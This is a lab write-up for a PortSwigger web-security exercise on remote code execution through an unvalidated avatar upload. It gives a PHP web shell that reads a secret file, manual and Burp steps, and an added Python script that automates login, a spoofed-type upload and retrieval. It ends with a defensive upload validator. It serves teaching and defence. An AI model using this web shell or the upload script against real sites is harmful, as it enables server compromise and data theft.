8.1 Lab: Remote code execution via web shell upload | 2023
This lab contains a vulnerable image upload function. It doesn’t perform any validation on uploaded files before storing them on the server. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of /home/carlos/secret | Karthikeyan Nagaraj
Description
This lab contains a vulnerable image upload function. It doesn’t perform any validation on the files users upload before storing them on the server’s filesystem.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
1. Solution without Burp Suite
1. Log in to the page using the credentials wiener:peter.
2. There is an image upload function (the avatar upload on the account page) where we can upload files.
3. Upload an image, then right-click the displayed avatar and open it in a new tab. The URL shows where uploaded files are stored and served from:
https://LAB-ID.web-security-academy.net/files/avatars/image1.png
4. In any file upload function, if the uploaded file is not validated (name, extension or contents), there is a good chance the vulnerability can be exploited: when the server stores the file under a web-accessible path and treats .php files as executable, an uploaded script runs as soon as it is requested.
5. Here, let us inject a payload via the upload function.
6. Save the code below in a file with any name and a .php extension, e.g. exploit.php:
<?php echo file_get_contents('/home/carlos/secret'); ?>
7. Upload the file, then repeat step 3: open the uploaded file in a new tab (https://LAB-ID.web-security-academy.net/files/avatars/exploit.php). The server executes the script instead of serving it as a static file.
8. You will now see the secret in the response.
9. Submit the secret via the Submit solution button in the lab banner to solve the lab.
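The same steps can be driven from a script instead of a browser. The block below is an added example and not part of the original write-up or of PortSwigger's materials: it logs in, uploads the web shell through the avatar form and requests it back, using only the Python standard library. The lab host (LAB-ID placeholder), the endpoints /login, /my-account and /my-account/avatar, and the form field names csrf, username, password, user and avatar are assumptions taken from a typical lab instance and are not stated on this page; check them against the requests in your own proxy history before running it.

```python
"""Added example: automate the "solution without Burp Suite" flow.

Assumptions (not stated on the page; verify against your own lab):
  * login form:  POST /login with fields csrf, username, password
  * avatar form: POST /my-account/avatar with fields csrf, user and a
    file field named "avatar"
  * uploaded files are served from /files/avatars/<filename>
"""
import re
import secrets
import sys
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

# The web shell from the write-up; the only payload the lab needs.
WEB_SHELL = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"

CSRF_RE = re.compile(r'name="csrf"\s+value="([^"]+)"')


def extract_csrf(html: str) -> str:
    """Pull the per-session anti-CSRF token out of a lab form."""
    m = CSRF_RE.search(html)
    if not m:
        raise ValueError("no csrf token found in form")
    return m.group(1)


def build_multipart(fields: dict, file_field: str, filename: str,
                    content: bytes, mime: str = "image/png") -> "tuple[str, bytes]":
    """Hand-roll a multipart/form-data body; returns (Content-Type, body).

    The Content-Type of the file part is attacker-controlled, which is why a
    server must never trust it: here we declare image/png while sending PHP.
    """
    boundary = "----shell" + secrets.token_hex(8)
    parts = []
    for name, value in fields.items():
        parts.append(f"--{boundary}\r\nContent-Disposition: form-data; "
                     f"name=\"{name}\"\r\n\r\n{value}\r\n".encode())
    parts.append(f"--{boundary}\r\nContent-Disposition: form-data; "
                 f"name=\"{file_field}\"; filename=\"{filename}\"\r\n"
                 f"Content-Type: {mime}\r\n\r\n".encode() + content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", b"".join(parts)


def run(lab: str, shell_name: str = "exploit.php") -> str:
    """Log in, upload the shell, request it, and return the secret."""
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar()))

    # 1. Log in as wiener:peter (credentials from the lab description).
    login_page = opener.open(f"{lab}/login").read().decode()
    creds = urllib.parse.urlencode({"csrf": extract_csrf(login_page),
                                    "username": "wiener",
                                    "password": "peter"}).encode()
    opener.open(f"{lab}/login", data=creds)

    # 2. Upload the PHP file through the (assumed) avatar form.
    account = opener.open(f"{lab}/my-account").read().decode()
    ctype, body = build_multipart({"csrf": extract_csrf(account), "user": "wiener"},
                                  "avatar", shell_name, WEB_SHELL)
    req = urllib.request.Request(f"{lab}/my-account/avatar", data=body,
                                 headers={"Content-Type": ctype})
    opener.open(req)

    # 3. The server stores the file under /files/avatars/ and executes it on GET.
    return opener.open(f"{lab}/files/avatars/{shell_name}").read().decode().strip()


if __name__ == "__main__":
    # usage: python3 shell_upload.py https://LAB-ID.web-security-academy.net
    print(run(sys.argv[1].rstrip("/")))
```

The multipart body is built by hand rather than with a library so the attacker-controlled parts are visible: the filename and the declared Content-Type of the file part are both chosen by the client, which is exactly what a server-side check must not rely on.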
2. PortSwigger’s Solution
1. While proxying traffic through Burp, log in to your account and notice the option for uploading an avatar image.
2. Upload an arbitrary image, then return to your account page. Notice that a preview of your avatar is now displayed on the page.
3. In Burp, go to Proxy > HTTP history. Click the filter bar to open the Filter settings dialog. Under Filter by MIME type, enable the Images checkbox, then apply your changes.
4. In the proxy history, notice that your image was fetched using a GET request to /files/avatars/<YOUR-IMAGE>. Send this request to Burp Repeater.
5. On your system, create a file called exploit.php, containing a script for fetching the contents of Carlos's secret file. For example:
<?php echo file_get_contents('/home/carlos/secret'); ?>
6. Use the avatar upload function to upload your malicious PHP file. The message in the response confirms that this was uploaded successfully.
7. In Burp Repeater, change the path of the request to point to your PHP file:
GET /files/avatars/exploit.php HTTP/1.1
8. Send the request. Notice that the server has executed your script and returned its output (Carlos’s secret) in the response.
9. Submit the secret to solve the lab.
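Both solutions work because the avatar handler accepts any filename and any content. The block below is an added example, not code from the lab, the write-up or PortSwigger: a framework-independent Python function showing the checks the lab's upload handler is missing. Allow-list the extension taken from the last suffix only, verify the file's magic bytes rather than the client's Content-Type, and store the file under a server-chosen random name. The allowed types, size limit and field names are my assumptions; the constructed PNG stand-in and the "polyglot" case are test data, not real files.

```python
"""Added example: the upload validation the lab's avatar handler lacks.

A hardened handler should
  1. allow-list the extension, read from the filename's LAST suffix only,
  2. check the content (magic bytes), never the client's Content-Type,
  3. store under a server-chosen name, never the attacker's filename,
  4. serve uploads from a location where the web server does not execute
     scripts (a deployment setting, so not shown as code here).
"""
import os
import secrets
from dataclasses import dataclass

# Assumed policy: allowed extension -> magic-byte prefixes expected at offset 0.
ALLOWED = {
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif":  (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit


@dataclass
class Decision:
    accepted: bool
    reason: str
    stored_name: str = ""  # server-chosen name; empty when rejected


def extension(filename: str) -> str:
    """Last suffix, lower-cased: 'shell.php.png' -> 'png', 'shell.php' -> 'php'."""
    base = os.path.basename(filename)  # drop directory components such as ../
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def validate_upload(filename: str, content: bytes) -> Decision:
    """Accept only allow-listed image types whose bytes match the type.

    The client's declared Content-Type is deliberately not a parameter:
    it is attacker-controlled and proves nothing about the file.
    """
    if len(content) > MAX_BYTES:
        return Decision(False, "too large")
    ext = extension(filename)
    if ext not in ALLOWED:
        return Decision(False, f"extension {ext!r} not allowed")
    if not any(content.startswith(sig) for sig in ALLOWED[ext]):
        return Decision(False, f"content is not a {ext} image")
    # Random server-side name: the attacker never chooses the served path,
    # and the extension is one the server decided to allow.
    return Decision(True, "ok", f"{secrets.token_hex(16)}.{ext}")


if __name__ == "__main__":
    shell = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # constructed stand-in for a PNG
    for name, data in [("exploit.php", shell),      # the lab's payload
                       ("exploit.png", shell),      # renamed, still PHP inside
                       ("avatar.png", png),         # genuine-looking image
                       ("poly.png", png + shell)]:  # PNG header with PHP appended
        print(name, validate_upload(name, data))
```

The last case in the demo is the caveat: a file that starts with a valid PNG header and carries PHP after it passes the magic-byte check. That is tolerable only because the server picks the stored name and extension and serves the directory without script execution; if the web server decided what to execute from an attacker-controlled extension, the content check alone would not save it. Re-encoding the image on the server (decode and write a fresh file) removes appended payloads as well.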
If you would like to support me so that I could create more free content — https://www.buymeacoffee.com/cyberw1ng
Thank you for Reading!
Happy Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng
Telegram Channel for Ethical Hacking Dumps — https://t.me/ethicalhackingessentials